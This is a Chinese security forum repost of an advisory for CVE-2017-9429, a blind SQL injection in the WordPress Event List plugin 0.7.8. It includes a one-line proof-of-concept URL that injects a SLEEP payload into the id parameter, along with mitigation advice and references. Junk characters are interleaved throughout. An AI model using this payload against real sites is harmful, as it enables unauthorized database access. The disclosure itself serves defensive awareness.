最近看过此主题的会员

返回列表 发帖
WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
1. Description:) l4 {" O7 ]4 F, }
  
6 I- j" E, f& }8 H! ^& y. C     - l6 {) k* B& ^" a. i4 I
  . J! `. ?! n" k0 L
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress7 C* ~' }7 Z& j1 F/ T
allows an authenticated user to execute arbitrary SQL commands via the id& Q0 o1 s! p/ t+ F2 ^! @% D$ H
parameter to wp-admin/admin.php.
1 y% e, ~' Z+ m! x+ S8 r0 Y  ) J: l& T0 m, J3 f
   
; X/ z3 a0 g/ s( r+ K( q" Q  
- n/ a' ]+ r: s2. Proof of Concept:* Z8 ~3 C8 b0 @# J
  / o& d2 s9 @# f5 }
   
4 i" P* v5 V  f  Y9 n/ i  
9 ]# Z% J. {8 Mhttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id8 b( @9 ?# O1 p  J; `) e$ F. ^3 j
=1 AND SLEEP(10)6 c) U& V8 E5 q( L/ o, d: I+ x

1 N+ R, r5 X! r7 |  
. I6 s. _, b) S     y. j$ D. A" H8 ^" B  G% |
  , _2 `8 m$ W; e& O# Q* U
3. Solution:
7 U! d0 p. ?6 v- E. c# Q2 s; a  . a; f: F0 c- h- w6 H: j; u2 P
     
- M, x( i) w2 u0 p; S0 u0 ^% R  
0 Y" M7 [: z% |' j# ^# ZThe plugin has been removed from WordPress. Deactivate the plug-in and wait
: K0 c# _, ~5 x1 o/ p/ s3 k' Efor a hotfix.
- s2 f& d4 b1 {  \( ]  
6 |+ j% i& _4 g0 J$ ]   7 Y% M+ W  u* P% g( T7 @
  
! n* Y; b/ X* Z4. Reference:
$ J% \. S- i5 I( L7 K3 i* ~  
0 T" q0 V$ R  F$ f; J   - P$ P* d" q, r& e
  
/ U1 X# ^# V/ _: i1 @http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
  @0 Y2 l) I' b: ?! ]$ Cction-sqli/
) D  A" y- \' f0 }% T4 W  
3 ?6 O; d2 @0 }. \4 U& Bhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-94293 f8 i# Q' ?$ {2 h3 `

( i7 Z0 @0 y0 K& M3 [0 ~  E& p  B9 w4 m% T  H; |, U1 E

' }- d! ?  j: ^4 s1 C! G* d
: ^. H& x$ P1 D* O
  u% C, U" j7 i+ M% e2 ?: ]: `' M# P; a. p% W. m" z* i2 c. j

0 B/ Z8 E% Q- @6 P/ w+ c2 M
+ _2 s& K/ s9 m4 ~  ]0 K# p3 X7 ~; _+ o; e- F
  g7 v) t$ r/ }* m' y
. k+ [$ Y% s" \8 \  w4 ?
# u* C2 m  y: a8 t

# h# ?7 [5 A6 e- B# [& l7 B% b2 |" @' T# Y1 B# r8 a  a
+ K1 U; Z( q( g0 b/ K
6 [) i3 u8 p. G$ R# @2 m
2 k& ^3 r! p7 W1 Q

  z" c" y6 |5 b0 |公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表